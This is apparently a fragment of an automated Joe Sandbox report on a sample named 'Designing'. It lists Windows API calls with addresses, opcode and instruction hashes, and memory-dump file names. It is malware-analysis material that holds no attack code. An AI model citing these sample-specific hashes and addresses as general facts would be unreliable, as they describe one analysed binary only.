                                                                                                                                                                              • Opcode Fuzzy Hash: c0dbdf3945c9cf1395d5e77f2d0df2b2a466d68cfd689ceea049eb8d106663c1
                                                                                                                                                                              • Instruction Fuzzy Hash: DAB11071604300AFC324DF24D885F2ABBE4EF85318F54954CF55A6B2A2DB31ED86CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • __allrem.LIBCMT ref: 00DD042A
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DD0446
                                                                                                                                                                              • __allrem.LIBCMT ref: 00DD045D
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DD047B
                                                                                                                                                                              • __allrem.LIBCMT ref: 00DD0492
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DD04B0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                                                              • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                              • Instruction ID: 8afe761b8849d3f13f59bfeda0a4b51e95504ebc5e32913120f77ed0a0cf6604
                                                                                                                                                                              • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                              • Instruction Fuzzy Hash: 5681E7726007069BE720AF69CC81B6A7BE9EF95324F28412FF551D7781E7B0D9008BB5
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00DC8649,00DC8649,?,?,?,00DD67C2,00000001,00000001,8BE85006), ref: 00DD65CB
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DD67C2,00000001,00000001,8BE85006,?,?,?), ref: 00DD6651
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DD674B
                                                                                                                                                                              • __freea.LIBCMT ref: 00DD6758
                                                                                                                                                                                • Part of subcall function 00DD3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DC6A79,?,0000015D,?,?,?,?,00DC85B0,000000FF,00000000,?,?), ref: 00DD3BC5
                                                                                                                                                                              • __freea.LIBCMT ref: 00DD6761
                                                                                                                                                                              • __freea.LIBCMT ref: 00DD6786
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                              • Opcode ID: 13aa7a7543ec34e64ee348808eff0dae4b2783c7987daf0f14b5e97ebd67e244
                                                                                                                                                                              • Instruction ID: e9aa472f47b4b3e2bc63ef60455dcebc4258ae2e60dc4b0ec9e5e34dc5958fb9
                                                                                                                                                                              • Opcode Fuzzy Hash: 13aa7a7543ec34e64ee348808eff0dae4b2783c7987daf0f14b5e97ebd67e244
                                                                                                                                                                              • Instruction Fuzzy Hash: 1451E472A0020ABFDB258F64CC85EBB77AAEB40754F19466AFD14D6240EB74DC54C6F0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E2D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E2C10E,?,?), ref: 00E2D415
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D451
  • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4C8
  • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2C72A
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E2C785
• RegCloseKey.ADVAPI32(00000000), ref: 00E2C7CA
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E2C7F9
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E2C853
• RegCloseKey.ADVAPI32(?), ref: 00E2C85F
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 1120388591-0
• Opcode ID: d4b430bb428fef6b783236ee566fc4a3221faef9eaecbabe3e41d495d39be03d
• Instruction ID: 37ee65fb159fcb6f748527b8b02f44c6f176d17015fbe182110380cd0cf9008d
• Instruction Fuzzy Hash: 60819D70108241AFC718DF24D885E2ABBE5FF84308F24959DF4595B2A2DB31ED46CFA2
APIs
• VariantInit.OLEAUT32(00000035), ref: 00E000A9
• SysAllocString.OLEAUT32(00000000), ref: 00E00150
• VariantCopy.OLEAUT32(00E00354,00000000), ref: 00E00179
• VariantClear.OLEAUT32(00E00354), ref: 00E0019D
• VariantCopy.OLEAUT32(00E00354,00000000), ref: 00E001A1
• VariantClear.OLEAUT32(?), ref: 00E001AB
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
• Opcode ID: 186307a396b16db85bbe06d91de2669745d6124619eae23d2ea3becae290e960
• Instruction ID: 534697a77437c8358b2a3fd8e873f9ebc96dbc5893112e493dd91fe3aef33df2
• Instruction Fuzzy Hash: 1051A835640310EACF20AB649889B69B7E5EF55310F14A447F906FF2E7DB709C84CB66
APIs
  • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
  • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
• GetOpenFileNameW.COMDLG32(00000058), ref: 00E19F2A
• _wcslen.LIBCMT ref: 00E19F4B
• _wcslen.LIBCMT ref: 00E19F72
• GetSaveFileNameW.COMDLG32(00000058), ref: 00E19FCA
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: _wcslen$FileName$OpenSave
• String ID: X
• API String ID: 83654149-3081909835
• Opcode ID: 0ca1df3ba7cbde523c75aa0b9fbbf17066d10728aa55ac2f847d7e8551d4af5f
• Instruction ID: 67fbb75788c3dbf1ce7601df1a1216fd0ec2fd4c4b4e11dae5510ba61443ec25
• Instruction Fuzzy Hash: EEE16F716043419FD724DF24C891AAAB7E1FF85314F04896DF889AB2A2DB31DD45CBA2
APIs
• _wcslen.LIBCMT ref: 00E16F21
• CoInitialize.OLE32(00000000), ref: 00E1707E
• CoCreateInstance.OLE32(00E40CC4,00000000,00000001,00E40B34,?), ref: 00E17095
• CoUninitialize.OLE32 ref: 00E17319
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: ecc3828c6afe61679100705da129150c11c211821bcfa9bcd482f18a6284c43f
• Instruction ID: c7509f89e3492ae02224e9ec1bba6d47c32e870cd520bf137dfd5cd60047009c
• Instruction Fuzzy Hash: 5CD13B71608301AFC304DF24C881EABB7E8FF99708F44496DF59697252DB71E945CBA2
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00E111B3
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00E111EE
• EnterCriticalSection.KERNEL32(?), ref: 00E1120A
• LeaveCriticalSection.KERNEL32(?), ref: 00E11283
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00E1129A
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00E112C8
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
• String ID:
• API String ID: 3368777196-0
• Opcode ID: 0fc9f032137bfd977c2ea81df861dd959a3b0318cb00dbad6d23fc2459dbfa1d
• Instruction ID: c4cb30db7eb4f7e360ef0c7caa5ce7a10a820a9066a07cd3e4cea70a6a88046c
• Instruction Fuzzy Hash: DE413D71900205EFDF059F55DC85AAABBB8FF44314F1440A9EE00AB2A6D770DE55DBA0
APIs
• ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00DFFBEF,00000000,?,?,00000000,?,00DE39E2,00000004,00000000,00000000), ref: 00E38CA7
• EnableWindow.USER32(?,00000000), ref: 00E38CCD
• ShowWindow.USER32(FFFFFFFF,00000000), ref: 00E38D2C
• ShowWindow.USER32(?,00000004), ref: 00E38D40
• EnableWindow.USER32(?,00000001), ref: 00E38D66
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E38D8A
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: e484beca0c9c0d6b30cf21a99b5f283a891a42059abd015f14f7e4eba69ed359
• Instruction ID: 6292d4ddf18653934e55dabab2e43fa070a7622e3e052693a8ffd0e2deca6bac
                                                                                                                                                                              • Opcode Fuzzy Hash: e484beca0c9c0d6b30cf21a99b5f283a891a42059abd015f14f7e4eba69ed359
                                                                                                                                                                              • Instruction Fuzzy Hash: 5541B630601344AFDB25DF25DA9DBA17FF1FB85308F5860A9F6087B2A2CB316849CB51
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00E22D45
                                                                                                                                                                                • Part of subcall function 00E1EF33: GetWindowRect.USER32(?,?), ref: 00E1EF4B
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00E22D6F
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00E22D76
                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00E22DB2
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00E22DDE
                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E22E3C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2387181109-0
                                                                                                                                                                              • Opcode ID: 08efe451db2182ac16c01b04e4a79d230efa47296c4a4b420b8b9d7306fd6970
                                                                                                                                                                              • Instruction ID: d50b16dadf30679f4696ee1836b71bd63ef8a9d0861a0b3b5a60f03f85fca29d
                                                                                                                                                                              • Opcode Fuzzy Hash: 08efe451db2182ac16c01b04e4a79d230efa47296c4a4b420b8b9d7306fd6970
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A31EF72509329AFC720DF14AC49B9ABBA9FBC4314F00091EF995A7191DB30E959CBD2
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00E055F9
                                                                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E05616
                                                                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E0564E
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0566C
                                                                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E05674
                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00E0567E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 72514467-0
                                                                                                                                                                              • Opcode ID: 8d091839ea9fd46b960313b2e3a2266b1f84f3bc69411bccf2d72363faadc3b3
                                                                                                                                                                              • Instruction ID: f2ea156919465c530e13a134d7d3e4eecb4d40f6d848aca57f5cef4c6428fda3
                                                                                                                                                                              • Opcode Fuzzy Hash: 8d091839ea9fd46b960313b2e3a2266b1f84f3bc69411bccf2d72363faadc3b3
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E210432204604BBEB165B69AC49F7B7FA8DF44710F14402EF805EA0D1EA72CC818A70
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA55D1,?,?,00DE4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DA5871
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E162C0
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00E163DA
                                                                                                                                                                              • CoCreateInstance.OLE32(00E40CC4,00000000,00000001,00E40B34,?), ref: 00E163F3
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00E16411
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                              • API String ID: 3172280962-24824748
                                                                                                                                                                              • Opcode ID: 636c72fd1d926c769c84e0a5d5fc17694bdf3af89cc8eca69687f284f2f7f46f
                                                                                                                                                                              • Instruction ID: 6d2dbcacadbff7add59095e86a436c9a0989d15c415df754220a14e8f87daa68
                                                                                                                                                                              • Opcode Fuzzy Hash: 636c72fd1d926c769c84e0a5d5fc17694bdf3af89cc8eca69687f284f2f7f46f
                                                                                                                                                                              • Instruction Fuzzy Hash: 17D12471A042019FC714DF24C484A6ABBE5FF89714F14985DF895AB361CB32ED85CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00DC36E9,00DC3355), ref: 00DC3700
                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DC370E
                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DC3727
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00DC36E9,00DC3355), ref: 00DC3779
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                              • Opcode ID: 3e00dd8c7a14da70171a5a8e74952cd973a84a9461ebf9998a23a48f2e524f1e
                                                                                                                                                                              • Instruction ID: 42523bfa7642a1d45f8076730f418d9f5d910b3840c60d3c3d86406ab7b58e29
                                                                                                                                                                              • Opcode Fuzzy Hash: 3e00dd8c7a14da70171a5a8e74952cd973a84a9461ebf9998a23a48f2e524f1e
                                                                                                                                                                              • Instruction Fuzzy Hash: 510124B2A5E3132EE66527B6BCD6F672A95EB057B1720422DF010930F0EF928D1656B0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00DC4D53,00000000,?,?,00DC68E2,?,?,00000000), ref: 00DD30EB
                                                                                                                                                                              • _free.LIBCMT ref: 00DD311E
                                                                                                                                                                              • _free.LIBCMT ref: 00DD3146
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 00DD3153
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 00DD315F
                                                                                                                                                                              • _abort.LIBCMT ref: 00DD3165
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                              • Opcode ID: addb2650fa462cc92dd00fe3379d6e8ff73dcfdfbc4da275c0182c9f748cb58d
                                                                                                                                                                              • Instruction ID: ad51ee295264643cfc93c307a8bf07d47bba6687bf19c9d411f35c617cdb067c
                                                                                                                                                                              • Opcode Fuzzy Hash: addb2650fa462cc92dd00fe3379d6e8ff73dcfdfbc4da275c0182c9f748cb58d
                                                                                                                                                                              • Instruction Fuzzy Hash: FEF0CD35A487022BC2126736BC0FB6F1666EFD1771B290417F918E23D1EE618E064173
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DA1F87
                                                                                                                                                                                • Part of subcall function 00DA1F2D: SelectObject.GDI32(?,00000000), ref: 00DA1F96
                                                                                                                                                                                • Part of subcall function 00DA1F2D: BeginPath.GDI32(?), ref: 00DA1FAD
  • Part of subcall function 00DA1F2D: SelectObject.GDI32(?,00000000), ref: 00DA1FD6
• MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E394AA
• LineTo.GDI32(?,00000003,00000000), ref: 00E394BE
• MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E394CC
• LineTo.GDI32(?,00000000,00000003), ref: 00E394DC
• EndPath.GDI32(?), ref: 00E394EC
• StrokePath.GDI32(?), ref: 00E394FC
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: b2cd4f3e85fd0d83db9d019d7fb42e64e3ba4a82a8b5763d001c42ee3184d50c
• Instruction ID: 64be743d9937714501b7d8dfcd87ff720d8dbd24429a75f84cc3c250bfce4ce0
• Opcode Fuzzy Hash: b2cd4f3e85fd0d83db9d019d7fb42e64e3ba4a82a8b5763d001c42ee3184d50c
• Instruction Fuzzy Hash: EE111B7600410DBFDF029F91EC88E9A7F6DEF08364F048011BA196A161C7719D59DFA0
APIs
• GetDC.USER32(00000000), ref: 00E05B7C
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00E05B8D
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E05B94
• ReleaseDC.USER32(00000000,00000000), ref: 00E05B9C
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E05BB3
• MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E05BC5
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
